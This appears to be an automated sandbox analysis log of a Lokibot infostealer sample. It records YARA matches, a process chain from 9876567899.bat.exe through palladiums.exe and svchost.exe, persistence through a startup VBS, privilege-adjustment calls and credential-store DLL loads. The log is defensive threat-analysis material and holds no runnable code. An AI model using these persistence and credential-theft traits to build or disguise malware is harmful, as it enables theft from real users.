                Source: Process Memory Space: palladiums.exe PID: 7500, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7544, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7576, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7600, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7620, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7672, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7696, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7716, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7736, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7760, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7780, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7800, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7820, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7856, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@99/9@1/2
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007837B5 GetLastError,FormatMessageW,0_2_007837B5
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007710BF AdjustTokenPrivileges,CloseHandle,0_2_007710BF
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007716C3
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000910BF AdjustTokenPrivileges,CloseHandle,2_2_000910BF
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_000916C3
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_007851CD
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0079A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0079A67C
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0078648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0078648E
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007142A2
                Source: C:\Users\user\Desktop\9876567899.bat.exeFile created: C:\Users\user\AppData\Local\preinheredJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:64:WilError_03
                Source: C:\Users\user\Desktop\9876567899.bat.exeFile created: C:\Users\user\AppData\Local\Temp\shruggedJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs"
                Source: 9876567899.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: svchost.exe, 00000003.00000003.2030073690.0000000002DB5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 9876567899.bat.exeVirustotal: Detection: 29%
                Source: C:\Users\user\Desktop\9876567899.bat.exeFile read: C:\Users\user\Desktop\9876567899.bat.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\9876567899.bat.exe "C:\Users\user\Desktop\9876567899.bat.exe"
                Source: C:\Users\user\Desktop\9876567899.bat.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\Desktop\9876567899.bat.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9876567899.bat.exe"
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Dhy2kmz.exe "C:\Users\user\AppData\Roaming\Dhy2kmz.exe"
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess created: C:\Users\user\AppData\Roaming\Dhy2kmz.exe "C:\Users\user\AppData\Roaming\Dhy2kmz.exe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 996
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\Desktop\9876567899.bat.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\Desktop\9876567899.bat.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9876567899.bat.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Dhy2kmz.exe "C:\Users\user\AppData\Roaming\Dhy2kmz.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess created: C:\Users\user\AppData\Roaming\Dhy2kmz.exe "C:\Users\user\AppData\Roaming\Dhy2kmz.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: unknown unknown
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
